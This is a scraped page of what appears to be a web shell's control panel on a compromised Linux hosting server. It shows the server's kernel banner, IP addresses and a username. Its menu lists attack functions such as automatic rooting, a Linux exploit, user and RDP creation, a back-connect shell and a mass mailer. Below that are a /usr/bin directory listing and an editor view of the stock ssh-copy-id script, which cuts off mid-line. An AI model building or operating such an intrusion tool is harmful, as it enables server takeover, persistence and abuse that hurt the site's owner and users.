Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
GET
15.82
KB
-rwxr-xr-x
[
51.63
KB
-rwxr-xr-x
aclocal
35.52
KB
-rwxr-xr-x
aclocal-1.16
35.52
KB
-rwxr-xr-x
addr2line
27.74
KB
-rwxr-xr-x
agentxtrap
27.3
KB
-rwxr-xr-x
animate
15.09
KB
-rwxr-xr-x
ar
55.98
KB
-rwxr-xr-x
arch
31.47
KB
-rwxr-xr-x
arpaname
15.11
KB
-rwxr-xr-x
as
710.31
KB
-rwxr-xr-x
aspell
151.12
KB
-rwxr-xr-x
at
4.41
KB
-rwxr-xr-x
atq
4.41
KB
-rwxr-xr-x
atrm
4.41
KB
-rwxr-xr-x
autoconf
14.42
KB
-rwxr-xr-x
autoheader
8.33
KB
-rwxr-xr-x
autom4te
31.43
KB
-rwxr-xr-x
automake
251.93
KB
-rwxr-xr-x
automake-1.16
251.93
KB
-rwxr-xr-x
autoreconf
20.57
KB
-rwxr-xr-x
autoscan
16.72
KB
-rwxr-xr-x
autoupdate
33.08
KB
-rwxr-xr-x
awk
698.17
KB
-rwxr-xr-x
b2sum
51.59
KB
-rwxr-xr-x
base32
35.49
KB
-rwxr-xr-x
base64
35.49
KB
-rwxr-xr-x
basename
31.48
KB
-rwxr-xr-x
basenc
47.83
KB
-rwxr-xr-x
bash
1.32
MB
-rwxr-xr-x
bashbug-64
6.91
KB
-rwxr-xr-x
batch
140
B
-rwxr-xr-x
bison
494.76
KB
-rwxr-xr-x
bunzip2
39.45
KB
-rwxr-xr-x
bzcat
39.45
KB
-rwxr-xr-x
bzcmp
2.09
KB
-rwxr-xr-x
bzdiff
2.09
KB
-rwxr-xr-x
bzgrep
2.01
KB
-rwxr-xr-x
bzip2
39.45
KB
-rwxr-xr-x
bzip2recover
15.23
KB
-rwxr-xr-x
bzless
1.23
KB
-rwxr-xr-x
bzmore
1.23
KB
-rwxr-xr-x
c++
1.05
MB
-rwxr-xr-x
c++filt
27.19
KB
-rwxr-xr-x
c89
228
B
-rwxr-xr-x
c99
219
B
-rwxr-xr-x
cagefs_enter.proxied
4.42
KB
-rwxr-xr-x
cal
51.82
KB
-rwxr-xr-x
captoinfo
87.79
KB
-rwxr-xr-x
cat
35.45
KB
-rwxr-xr-x
catchsegv
3.21
KB
-rwxr-xr-x
cc
1.04
MB
-rwxr-xr-x
chcon
60.05
KB
-rwxr-xr-x
chgrp
55.98
KB
-rwxr-xr-x
chmod
55.96
KB
-rwxr-xr-x
chown
59.99
KB
-rwxr-xr-x
chrt
27.3
KB
-rwxr-xr-x
cksum
31.38
KB
-rwxr-xr-x
cldetect
10.96
KB
-rwxr-xr-x
clear
15.15
KB
-rwxr-xr-x
cmp
40.13
KB
-rwxr-xr-x
col
23.23
KB
-rwxr-xr-x
colcrt
15.19
KB
-rwxr-xr-x
colrm
15.16
KB
-rwxr-xr-x
column
35.34
KB
-rwxr-xr-x
comm
35.55
KB
-rwxr-xr-x
compare
15.09
KB
-rwxr-xr-x
composite
15.09
KB
-rwxr-xr-x
conjure
15.1
KB
-rwxr-xr-x
convert
15.1
KB
-rwxr-xr-x
cp
141.02
KB
-rwxr-xr-x
cpan
8.37
KB
-rwxr-xr-x
cpp
1.05
MB
-rwxr-xr-x
crontab
1.49
KB
-rwxr-xr-x
crontab.cagefs
40.47
KB
-rwxr-xr-x
csplit
108.67
KB
-rwxr-xr-x
curl
248.48
KB
-rwxr-xr-x
cut
43.6
KB
-rwxr-xr-x
cyrusbdb2current
1.58
MB
-rwxr-xr-x
date
103.84
KB
-rwxr-xr-x
dbiprof
6.06
KB
-rwxr-xr-x
dd
67.95
KB
-rwxr-xr-x
delv
45.38
KB
-rwxr-xr-x
df
80.53
KB
-rwxr-xr-x
diff
194.7
KB
-rwxr-xr-x
diff3
52.3
KB
-rwxr-xr-x
dig
136.59
KB
-rwxr-xr-x
dir
137.45
KB
-rwxr-xr-x
dircolors
39.62
KB
-rwxr-xr-x
dirname
27.3
KB
-rwxr-xr-x
display
15.09
KB
-rwxr-xr-x
dnstap-read
23.19
KB
-rwxr-xr-x
du
149.27
KB
-rwxr-xr-x
echo
27.28
KB
-rwxr-xr-x
ed
52.51
KB
-rwxr-xr-x
egrep
32
B
-rwxr-xr-x
enc2xs
40.69
KB
-rwxr-xr-x
enchant
23.73
KB
-rwxr-xr-x
enchant-lsmod
15.8
KB
-rwxr-xr-x
env
44.03
KB
-rwxr-xr-x
eps2eps
643
B
-rwxr-xr-x
eqn
189.52
KB
-rwxr-xr-x
ex
1.38
MB
-rwxr-xr-x
expand
39.54
KB
-rwxr-xr-x
expr
108.43
KB
-rwxr-xr-x
factor
71.87
KB
-rwxr-xr-x
false
27.28
KB
-rwxr-xr-x
fc-cache
139
B
-rwxr-xr-x
fc-cache-64
23.17
KB
-rwxr-xr-x
fc-cat
19.16
KB
-rwxr-xr-x
fc-conflist
15.13
KB
-rwxr-xr-x
fc-list
15.13
KB
-rwxr-xr-x
fc-match
15.13
KB
-rwxr-xr-x
fc-pattern
15.14
KB
-rwxr-xr-x
fc-query
15.13
KB
-rwxr-xr-x
fc-scan
15.14
KB
-rwxr-xr-x
fc-validate
15.14
KB
-rwxr-xr-x
fgrep
32
B
-rwxr-xr-x
file
27.63
KB
-rwxr-xr-x
find
284.95
KB
-rwxr-xr-x
flex
412.64
KB
-rwxr-xr-x
flex++
412.64
KB
-rwxr-xr-x
flock
23.37
KB
-rwxr-xr-x
fmt
39.58
KB
-rwxr-xr-x
fold
39.51
KB
-rwxr-xr-x
free
23.36
KB
-rwxr-xr-x
freetype-config
4.32
KB
-rwxr-xr-x
funzip
31.25
KB
-rwxr-xr-x
g++
1.05
MB
-rwxr-xr-x
gawk
698.17
KB
-rwxr-xr-x
gcc
1.04
MB
-rwxr-xr-x
gcc-ar
27.67
KB
-rwxr-xr-x
gcc-nm
27.65
KB
-rwxr-xr-x
gcc-ranlib
27.67
KB
-rwxr-xr-x
gcov
477.13
KB
-rwxr-xr-x
gcov-dump
291.77
KB
-rwxr-xr-x
gcov-tool
320.47
KB
-rwxr-xr-x
gem
542
B
-rwxr-xr-x
gencat
27.45
KB
-rwxr-xr-x
geoiplookup
15.87
KB
-rwxr-xr-x
geoiplookup6
15.82
KB
-rwxr-xr-x
geqn
189.52
KB
-rwxr-xr-x
getconf
35.23
KB
-rwxr-xr-x
getent
35.86
KB
-rwxr-xr-x
getopt
23.27
KB
-rwxr-xr-x
ghostscript
15.13
KB
-rwxr-xr-x
git
4.19
MB
-rwxr-xr-x
git-receive-pack
4.19
MB
-rwxr-xr-x
git-shell
807.58
KB
-rwxr-xr-x
git-upload-archive
4.19
MB
-rwxr-xr-x
git-upload-pack
4.19
MB
-rwxr-xr-x
gm
15.67
KB
-rwxr-xr-x
gmake
249.8
KB
-rwxr-xr-x
gneqn
916
B
-rwxr-xr-x
gnroff
3.21
KB
-rwxr-xr-x
gpg
1.07
MB
-rwxr-xr-x
gpg-agent
342.27
KB
-rwxr-xr-x
gpg-error
36.1
KB
-rwxr-xr-x
gpgsplit
27.5
KB
-rwxr-xr-x
gpgv
295.43
KB
-rwxr-xr-x
gpic
201.72
KB
-rwxr-xr-x
gprof
101.48
KB
-rwxr-xr-x
grep
154.49
KB
-rwxr-xr-x
groff
96.77
KB
-rwxr-xr-x
grops
167.26
KB
-rwxr-xr-x
grotty
122.2
KB
-rwxr-xr-x
groups
35.48
KB
-rwxr-xr-x
gs
15.13
KB
-rwxr-xr-x
gsnd
281
B
-rwxr-xr-x
gtar
522.29
KB
-rwxr-xr-x
gtbl
130.86
KB
-rwxr-xr-x
gtroff
732.07
KB
-rwxr-xr-x
gunzip
2.29
KB
-rwxr-xr-x
gzexe
6.33
KB
-rwxr-xr-x
gzip
88.95
KB
-rwxr-xr-x
h2ph
28.69
KB
-rwxr-xr-x
h2xs
59.5
KB
-rwxr-xr-x
head
39.6
KB
-rwxr-xr-x
hexdump
51.41
KB
-rwxr-xr-x
host
108.57
KB
-rwxr-xr-x
hostid
31.47
KB
-rwxr-xr-x
hostname
23.84
KB
-rwxr-xr-x
hunspell
102.67
KB
-rwxr-xr-x
iconv
64.09
KB
-rwxr-xr-x
icu-config
205
B
-rwxr-xr-x
icu-config-64
21.67
KB
-rwxr-xr-x
icuinfo
15.49
KB
-rwxr-xr-x
id
39.52
KB
-rwxr-xr-x
identify
15.1
KB
-rwxr-xr-x
idn
35.8
KB
-rwxr-xr-x
ifnames
4.03
KB
-rwxr-xr-x
import
15.09
KB
-rwxr-xr-x
infocmp
63.68
KB
-rwxr-xr-x
infotocap
87.79
KB
-rwxr-xr-x
install
149.08
KB
-rwxr-xr-x
instmodsh
4.1
KB
-rwxr-xr-x
ionice
15.21
KB
-rwxr-xr-x
ipcrm
19.23
KB
-rwxr-xr-x
ipcs
39.34
KB
-rwxr-xr-x
isosize
15.15
KB
-rwxr-xr-x
ispell
992
B
-rwxr-xr-x
join
51.69
KB
-rwxr-xr-x
kill
31.28
KB
-rwxr-xr-x
ld
1.71
MB
-rwxr-xr-x
ld.bfd
1.71
MB
-rwxr-xr-x
ldd
5.32
KB
-rwxr-xr-x
less
197.7
KB
-rwxr-xr-x
lessecho
15.17
KB
-rwxr-xr-x
lesskey
24.61
KB
-rwxr-xr-x
lesspipe.sh
3.5
KB
-rwxr-xr-x
lex
412.64
KB
-rwxr-xr-x
libnetcfg
15.41
KB
-rwxr-xr-x
libtool
359.18
KB
-rwxr-xr-x
libtoolize
126.17
KB
-rwxr-xr-x
link
31.48
KB
-rwxr-xr-x
ln
55.95
KB
-rwxr-xr-x
locale
59.08
KB
-rwxr-xr-x
localedef
314.05
KB
-rwxr-xr-x
logger
35.98
KB
-rwxr-xr-x
login
43.46
KB
-rwxr-xr-x
logname
31.47
KB
-rwxr-xr-x
look
19.17
KB
-rwxr-xr-x
ls
137.45
KB
-rwxr-xr-x
lto-dump
26.59
MB
-rwxr-xr-x
m4
240.4
KB
-rwxr-xr-x
make
249.8
KB
-rwxr-xr-x
make-dummy-cert
614
B
-rwxr-xr-x
mariadb
5.24
MB
-rwxr-xr-x
mariadb-access
109.48
KB
-rwxr-xr-x
mariadb-admin
4.79
MB
-rwxr-xr-x
mariadb-binlog
5.05
MB
-rwxr-xr-x
mariadb-check
4.79
MB
-rwxr-xr-x
mariadb-conv
4.52
MB
-rwxr-xr-x
mariadb-convert-table-format
4.28
KB
-rwxr-xr-x
mariadb-dump
4.89
MB
-rwxr-xr-x
mariadb-dumpslow
8.19
KB
-rwxr-xr-x
mariadb-embedded
23.81
MB
-rwxr-xr-x
mariadb-find-rows
3.35
KB
-rwxr-xr-x
mariadb-hotcopy
34.67
KB
-rwxr-xr-x
mariadb-import
4.78
MB
-rwxr-xr-x
mariadb-plugin
4.5
MB
-rwxr-xr-x
mariadb-secure-installation
13.66
KB
-rwxr-xr-x
mariadb-setpermission
17.7
KB
-rwxr-xr-x
mariadb-show
4.78
MB
-rwxr-xr-x
mariadb-slap
4.8
MB
-rwxr-xr-x
mariadb-tzinfo-to-sql
4.5
MB
-rwxr-xr-x
mariadb-waitpid
4.49
MB
-rwxr-xr-x
mcookie
27.3
KB
-rwxr-xr-x
md5sum
39.45
KB
-rwxr-xr-x
mesg
15.14
KB
-rwxr-xr-x
mkdir
68.12
KB
-rwxr-xr-x
mkfifo
39.64
KB
-rwxr-xr-x
mknod
43.68
KB
-rwxr-xr-x
mktemp
39.62
KB
-rwxr-xr-x
mogrify
15.1
KB
-rwxr-xr-x
montage
15.1
KB
-rwxr-xr-x
more
43.42
KB
-rwxr-xr-x
msql2mysql
1.42
KB
-rwxr-xr-x
mv
140.95
KB
-rwxr-xr-x
my_print_defaults
4.49
MB
-rwxr-xr-x
mysql
5.24
MB
-rwxr-xr-x
mysql_config
4.47
KB
-rwxr-xr-x
mysql_find_rows
3.35
KB
-rwxr-xr-x
mysql_waitpid
4.49
MB
-rwxr-xr-x
mysqlaccess
109.48
KB
-rwxr-xr-x
mysqladmin
4.79
MB
-rwxr-xr-x
mysqlbinlog
5.05
MB
-rwxr-xr-x
mysqlcheck
4.79
MB
-rwxr-xr-x
mysqldump
4.89
MB
-rwxr-xr-x
mysqlimport
4.78
MB
-rwxr-xr-x
mysqlshow
4.78
MB
-rwxr-xr-x
mytop
72.03
KB
-rwxr-xr-x
namei
23.23
KB
-rwxr-xr-x
nano
346.2
KB
-rwxr-xr-x
neqn
916
B
-rwxr-xr-x
net-snmp-create-v3-user
3.29
KB
-rwxr-xr-x
nice
35.48
KB
-rwxr-xr-x
nl
100.51
KB
-rwxr-xr-x
nm
44.72
KB
-rwxr-xr-x
nohup
35.4
KB
-rwxr-xr-x
nproc
35.5
KB
-rwxr-xr-x
nroff
3.21
KB
-rwxr-xr-x
nslookup
112.52
KB
-rwxr-xr-x
nsupdate
71.8
KB
-rwxr-xr-x
numfmt
55.63
KB
-rwxr-xr-x
objcopy
185.37
KB
-rwxr-xr-x
objdump
413.09
KB
-rwxr-xr-x
od
63.88
KB
-rwxr-xr-x
openssl
1.07
MB
-rwxr-xr-x
pango-list
19.11
KB
-rwxr-xr-x
pango-segmentation
19.13
KB
-rwxr-xr-x
pango-view
60.17
KB
-rwxr-xr-x
passenger
1.73
KB
-rwxr-xr-x
passwd
4.41
KB
-rwxr-xr-x
paste
35.39
KB
-rwxr-xr-x
patch
195.02
KB
-rwxr-xr-x
pathchk
35.47
KB
-rwxr-xr-x
pdf2dsc
701
B
-rwxr-xr-x
pdf2ps
913
B
-rwxr-xr-x
perl
15.13
KB
-rwxr-xr-x
perl5.32.1
15.13
KB
-rwxr-xr-x
perlbug
43.81
KB
-rwxr-xr-x
perldoc
118
B
-rwxr-xr-x
perlivp
10.56
KB
-rwxr-xr-x
perlml
14.49
KB
-rwxr-xr-x
perlthanks
43.81
KB
-rwxr-xr-x
pgrep
31.42
KB
-rwxr-xr-x
php
937
B
-rwxr-xr-x
pic
201.72
KB
-rwxr-xr-x
piconv
8.08
KB
-rwxr-xr-x
ping
89.33
KB
-rwxr-xr-x
pinky
35.41
KB
-rwxr-xr-x
pkg-config
335
B
-rwxr-xr-x
pkill
31.42
KB
-rwxr-xr-x
pl2pm
4.43
KB
-rwxr-xr-x
pmap
35.39
KB
-rwxr-xr-x
pod2html
4.04
KB
-rwxr-xr-x
pod2man
14.68
KB
-rwxr-xr-x
pod2text
10.55
KB
-rwxr-xr-x
pod2usage
4.01
KB
-rwxr-xr-x
podchecker
3.57
KB
-rwxr-xr-x
post-grohtml
199.76
KB
-rwxr-xr-x
pr
72.1
KB
-rwxr-xr-x
pre-grohtml
92.92
KB
-rwxr-xr-x
precat
5.53
KB
-rwxr-xr-x
preunzip
5.53
KB
-rwxr-xr-x
prezip
5.53
KB
-rwxr-xr-x
prezip-bin
15.69
KB
-rwxr-xr-x
printenv
31.29
KB
-rwxr-xr-x
printf
51.58
KB
-rwxr-xr-x
prove
13.24
KB
-rwxr-xr-x
ps
141.15
KB
-rwxr-xr-x
ps2ascii
635
B
-rwxr-xr-x
ps2epsi
1.24
KB
-rwxr-xr-x
ps2pdf
276
B
-rwxr-xr-x
ps2pdf12
219
B
-rwxr-xr-x
ps2pdf13
219
B
-rwxr-xr-x
ps2pdf14
219
B
-rwxr-xr-x
ps2pdfwr
1.06
KB
-rwxr-xr-x
ps2ps
651
B
-rwxr-xr-x
ps2ps2
673
B
-rwxr-xr-x
ptx
128.82
KB
-rwxr-xr-x
pwd
35.52
KB
-rwxr-xr-x
pwdx
15.28
KB
-rwxr-xr-x
pydoc
78
B
-rwxr-xr-x
pydoc3
78
B
-rwxr-xr-x
pydoc3.9
78
B
-rwxr-xr-x
python
15.09
KB
-rwxr-xr-x
python3
15.09
KB
-rwxr-xr-x
python3.9
15.09
KB
-rwxr-xr-x
ranlib
55.99
KB
-rwxr-xr-x
readelf
667.28
KB
-rwxr-xr-x
readlink
39.5
KB
-rwxr-xr-x
realpath
39.59
KB
-rwxr-xr-x
recode
31.93
KB
-rwxr-xr-x
red
92
B
-rwxr-xr-x
redis-benchmark
1.29
MB
-rwxr-xr-x
redis-check-aof
2.4
MB
-rwxr-xr-x
redis-check-rdb
2.4
MB
-rwxr-xr-x
redis-cli
934.89
KB
-rwxr-xr-x
redis-sentinel
2.4
MB
-rwxr-xr-x
redis-server
2.4
MB
-rwxr-xr-x
rename
23.23
KB
-rwxr-xr-x
renew-dummy-cert
729
B
-rwxr-xr-x
renice
15.16
KB
-rwxr-xr-x
replace
4.47
MB
-rwxr-xr-x
reset
27.34
KB
-rwxr-xr-x
rev
15.16
KB
-rwxr-xr-x
rm
59.99
KB
-rwxr-xr-x
rmdir
43.42
KB
-rwxr-xr-x
rnano
346.2
KB
-rwxr-xr-x
ruby
15.09
KB
-rwxr-xr-x
run-with-aspell
89
B
-rwxr-xr-x
runcon
35.46
KB
-rwxr-xr-x
rvi
1.38
MB
-rwxr-xr-x
rview
1.38
MB
-rwxr-xr-x
rvim
3.84
MB
-rwxr-xr-x
scalar
856.41
KB
-rwxr-xr-x
scl
39.55
KB
-rwxr-xr-x
scl_enabled
262
B
-rwxr-xr-x
scl_source
1.88
KB
-rwxr-xr-x
scp
132.91
KB
-rwxr-xr-x
script
51.58
KB
-rwxr-xr-x
sdiff
44.2
KB
-rwxr-xr-x
sed
112.84
KB
-rwxr-xr-x
selectorctl
8.08
KB
-rwxr-xr-x
seq
47.59
KB
-rwxr-xr-x
setsid
15.15
KB
-rwxr-xr-x
setterm
35.33
KB
-rwxr-xr-x
sftp
157.09
KB
-rwxr-xr-x
sh
1.32
MB
-rwxr-xr-x
sha1sum
39.44
KB
-rwxr-xr-x
sha224sum
39.45
KB
-rwxr-xr-x
sha256sum
39.45
KB
-rwxr-xr-x
sha384sum
39.45
KB
-rwxr-xr-x
sha512sum
39.45
KB
-rwxr-xr-x
shred
51.68
KB
-rwxr-xr-x
shuf
47.8
KB
-rwxr-xr-x
size
31.61
KB
-rwxr-xr-x
skill
31.4
KB
-rwxr-xr-x
slabtop
23.42
KB
-rwxr-xr-x
sleep
31.47
KB
-rwxr-xr-x
snice
31.4
KB
-rwxr-xr-x
snmpconf
25.44
KB
-rwxr-xr-x
sort
112.89
KB
-rwxr-xr-x
spell
125
B
-rwxr-xr-x
splain
18.96
KB
-rwxr-xr-x
split
52.11
KB
-rwxr-xr-x
sprof
35.45
KB
-rwxr-xr-x
sqlite3
1.54
MB
-rwxr-xr-x
ssh
896.38
KB
-rwxr-xr-x
ssh-add
305.72
KB
-rwxr-xr-x
ssh-agent
317.7
KB
-rwxr-xr-x
ssh-copy-id
13.84
KB
-rwxr-xr-x
ssh-keygen
475.41
KB
-rwxr-xr-x
ssh-keyscan
338.23
KB
-rwxr-xr-x
stat
79.85
KB
-rwxr-xr-x
stdbuf
43.55
KB
-rwxr-xr-x
strace
2.08
MB
-rwxr-xr-x
stream
15.09
KB
-rwxr-xr-x
strings
31.74
KB
-rwxr-xr-x
strip
185.36
KB
-rwxr-xr-x
stty
75.63
KB
-rwxr-xr-x
sum
35.38
KB
-rwxr-xr-x
sync
35.34
KB
-rwxr-xr-x
tabs
19.16
KB
-rwxr-xr-x
tac
100.39
KB
-rwxr-xr-x
tail
67.9
KB
-rwxr-xr-x
tar
522.29
KB
-rwxr-xr-x
taskset
23.23
KB
-rwxr-xr-x
tbl
130.86
KB
-rwxr-xr-x
tclsh
15.69
KB
-rwxr-xr-x
tclsh8.6
15.69
KB
-rwxr-xr-x
tee
35.49
KB
-rwxr-xr-x
test
43.61
KB
-rwxr-xr-x
tic
87.79
KB
-rwxr-xr-x
time
28.05
KB
-rwxr-xr-x
timeout
35.98
KB
-rwxr-xr-x
tload
19.34
KB
-rwxr-xr-x
tmpwatch
36.03
KB
-rwxr-xr-x
toe
23.23
KB
-rwxr-xr-x
top
132.27
KB
-rwxr-xr-x
touch
91.84
KB
-rwxr-xr-x
tput
27.25
KB
-rwxr-xr-x
tr
43.68
KB
-rwxr-xr-x
tree
85.45
KB
-rwxr-xr-x
troff
732.07
KB
-rwxr-xr-x
true
27.28
KB
-rwxr-xr-x
truncate
35.48
KB
-rwxr-xr-x
tset
27.34
KB
-rwxr-xr-x
tsort
47.6
KB
-rwxr-xr-x
tty
31.46
KB
-rwxr-xr-x
tzselect
14.99
KB
-rwxr-xr-x
uapi
4.41
KB
-rwxr-xr-x
ul
23.26
KB
-rwxr-xr-x
uname
31.48
KB
-rwxr-xr-x
unexpand
39.53
KB
-rwxr-xr-x
uniq
43.63
KB
-rwxr-xr-x
unlink
31.47
KB
-rwxr-xr-x
unzip
195.98
KB
-rwxr-xr-x
unzipsfx
87.7
KB
-rwxr-xr-x
uptime
15.29
KB
-rwxr-xr-x
users
31.5
KB
-rwxr-xr-x
utmpdump
23.21
KB
-rwxr-xr-x
vdir
137.45
KB
-rwxr-xr-x
vi
1.38
MB
-rwxr-xr-x
view
146
B
-rwxr-xr-x
vim
3.84
MB
-rwxr-xr-x
vimdiff
3.84
MB
-rwxr-xr-x
vimtutor
2.07
KB
-rwxr-xr-x
vmstat
39.41
KB
-rwxr-xr-x
watch
27.87
KB
-rwxr-xr-x
wc
43.53
KB
-rwxr-xr-x
wget
521.21
KB
-rwxr-xr-x
whereis
31.84
KB
-rwxr-xr-x
which
27.89
KB
-rwxr-xr-x
who
51.59
KB
-rwxr-xr-x
whoami
31.47
KB
-rwxr-xr-x
word-list-compress
15.7
KB
-rwxr-xr-x
x86_64-redhat-linux-c++
1.05
MB
-rwxr-xr-x
x86_64-redhat-linux-g++
1.05
MB
-rwxr-xr-x
x86_64-redhat-linux-gcc
1.04
MB
-rwxr-xr-x
x86_64-redhat-linux-gcc-11
1.04
MB
-rwxr-xr-x
xargs
64.09
KB
-rwxr-xr-x
xmlcatalog
23.16
KB
-rwxr-xr-x
xmllint
80.55
KB
-rwxr-xr-x
xmlwf
39.63
KB
-rwxr-xr-x
xsltproc
31.23
KB
-rwxr-xr-x
xsubpp
4.96
KB
-rwxr-xr-x
xxd
19.32
KB
-rwxr-xr-x
yes
31.31
KB
-rwxr-xr-x
zcat
1.94
KB
-rwxr-xr-x
zcmp
1.64
KB
-rwxr-xr-x
zdiff
6.3
KB
-rwxr-xr-x
zegrep
33
B
-rwxr-xr-x
zfgrep
33
B
-rwxr-xr-x
zforce
2.04
KB
-rwxr-xr-x
zgrep
7.93
KB
-rwxr-xr-x
zip
221.09
KB
-rwxr-xr-x
zipcloak
75.7
KB
-rwxr-xr-x
zipgrep
2.89
KB
-rwxr-xr-x
zipinfo
195.98
KB
-rwxr-xr-x
zipnote
67.61
KB
-rwxr-xr-x
zipsplit
63.58
KB
-rwxr-xr-x
zless
2.16
KB
-rwxr-xr-x
zmore
1.8
KB
-rwxr-xr-x
znew
4.47
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssh-copy-id
#!/usr/bin/sh # Copyright (c) 1999-2024 Philip Hands <phil@hands.com> # 2021 Carlos Rodríguez Gili <carlos.rodriguez-gili@upc.edu> # 2020 Matthias Blümel <blaimi@blaimi.de> # 2017 Sebastien Boyron <seb@boyron.eu> # 2013 Martin Kletzander <mkletzan@redhat.com> # 2010 Adeodato =?iso-8859-1?Q?Sim=F3?= <asp16@alu.ua.es> # 2010 Eric Moret <eric.moret@gmail.com> # 2009 Xr <xr@i-jeuxvideo.com> # 2007 Justin Pryzby <justinpryzby@users.sourceforge.net> # 2004 Reini Urban <rurban@x-ray.at> # 2003 Colin Watson <cjwatson@debian.org> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES # OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT # NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF # THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # Shell script to install your public key(s) on a remote machine # See the ssh-copy-id(1) man page for details # shellcheck shell=dash # check that we have something mildly sane as our shell, or try to find something better if false ^ printf "%s: WARNING: ancient shell, hunting for a more modern one... " "$0" then SANE_SH=${SANE_SH:-/usr/bin/ksh} if printf 'true ^ false\n' | "$SANE_SH" then printf "'%s' seems viable.\\n" "$SANE_SH" exec "$SANE_SH" "$0" "$@" else cat <<-EOF oh dear. If you have a more recent shell available, that supports \$(...) etc. please try setting the environment variable SANE_SH to the path of that shell, and then retry running this script. If that works, please report a bug describing your setup, and the shell you used to make it work. EOF printf '%s: ERROR: Less dimwitted shell required.\n' "$0" >&2 exit 1 fi fi # shellcheck disable=SC2010 DEFAULT_PUB_ID_FILE=$(ls -dt "${HOME}"/.ssh/id*.pub 2>/dev/null | grep -v -- '-cert.pub$' | head -n 1) SSH="ssh -a -x" TARGET_PATH=".ssh/authorized_keys" umask 0177 usage () { printf 'Usage: %s [-h|-?|-f|-n|-s|-x] [-i [identity_file]] [-t target_path] [-F ssh_config] [[-o ssh_option] ...] [-p port] [user@]hostname\n' "$0" >&2 printf '\t-f: force mode -- copy keys without trying to check if they are already installed\n' >&2 printf '\t-n: dry run -- no keys are actually copied\n' >&2 printf '\t-s: use sftp -- use sftp instead of executing remote-commands. Can be useful if the remote only allows sftp\n' >&2 printf '\t-x: debug -- enables -x in this shell, for debugging\n' >&2 printf '\t-h|-?: print this help\n' >&2 exit 1 } # escape any single quotes in an argument quote() { printf '%s\n' "$1" | sed -e "s/'/'\\\\''/g" } use_id_file() { L_ID_FILE="$1" if [ -z "$L_ID_FILE" ] ; then printf '%s: ERROR: no ID file found\n' "$0" >&2 exit 1 fi if expr "$L_ID_FILE" : '.*\.pub$' >/dev/null ; then PUB_ID_FILE="$L_ID_FILE" else PUB_ID_FILE="$L_ID_FILE.pub" fi [ "$FORCED" ] || PRIV_ID_FILE=$(dirname "$PUB_ID_FILE")/$(basename "$PUB_ID_FILE" .pub) # check that the files are readable for f in "$PUB_ID_FILE" ${PRIV_ID_FILE:+"$PRIV_ID_FILE"} ; do ErrMSG=$( { : < "$f" ; } 2>&1 ) || { L_PRIVMSG="" [ "$f" = "$PRIV_ID_FILE" ] && L_PRIVMSG=" (to install the contents of '$PUB_ID_FILE' anyway, look at the -f option)" printf "\\n%s: ERROR: failed to open ID file '%s': %s\\n" "$0" "$f" "$(printf '%s\n%s\n' "$ErrMSG" "$L_PRIVMSG" | sed -e 's/.*: *//')" >&2 exit 1 } done GET_ID="cat \"$PUB_ID_FILE\"" } if [ -n "$SSH_AUTH_SOCK" ] && ssh-add -L >/dev/null 2>&1 ; then GET_ID="ssh-add -L" fi OPTS="io:p:F:t:fnsxh?" while getopts "$OPTS" OPT do case "$OPT" in i) [ "${SEEN_OPT_I}" ] && { printf '\n%s: ERROR: -i option must not be specified more than once\n\n' "$0" >&2 usage } SEEN_OPT_I="yes" # Check for -i's optional parameter eval "nextarg=\${$OPTIND}" # shellcheck disable=SC2154 if [ $OPTIND = $# ]; then if [ -r "$nextarg" ] && grep -iq ssh "$nextarg"; then printf '\n%s: ERROR: Missing hostname. Use "-i -- %s" if you really mean to use this as the hostname\n\n' "$0" "$nextarg" >&2 usage fi elif ! expr -- "$nextarg" : "-[$(echo "$OPTS" | tr -d :)-]" >/dev/null ; then # when not at the last arg, and not followed by an option, -i has an argument OPTARG="$nextarg" OPTIND=$((OPTIND + 1)) fi use_id_file "${OPTARG:-$DEFAULT_PUB_ID_FILE}" ;; o|F) OPTS_oF="${OPTS_oF:+$OPTS_oF }-$OPT '$(quote "${OPTARG}")'" ;; f) FORCED=1 ;; n) DRY_RUN=1 ;; p) SSH_PORT=${OPTARG} ;; s) SFTP=sftp ;; t) TARGET_PATH="${OPTARG}" ;; x) SET_X="set -x;" set -x ;; h|\?) usage ;; esac done #shift all args to keep only USER_HOST shift $((OPTIND-1)) if [ $# = 0 ] ; then usage fi if [ $# != 1 ] ; then printf '%s: ERROR: Too many arguments. Expecting a target hostname, got: %s\n\n' "$0" "$SAVEARGS" >&2 usage fi USER_HOST="$*" # tack the hostname onto SSH_OPTS OPTS_USER_HOST="${OPTS_oF:+$OPTS_oF }'$(quote "$USER_HOST")'" SSH_OPTS="${SSH_PORT:+-p $SSH_PORT }$OPTS_USER_HOST" # and populate "$@" for later use (only way to get proper quoting of options) eval set -- "$SSH_OPTS" # shellcheck disable=SC2086 if [ -z "$(eval 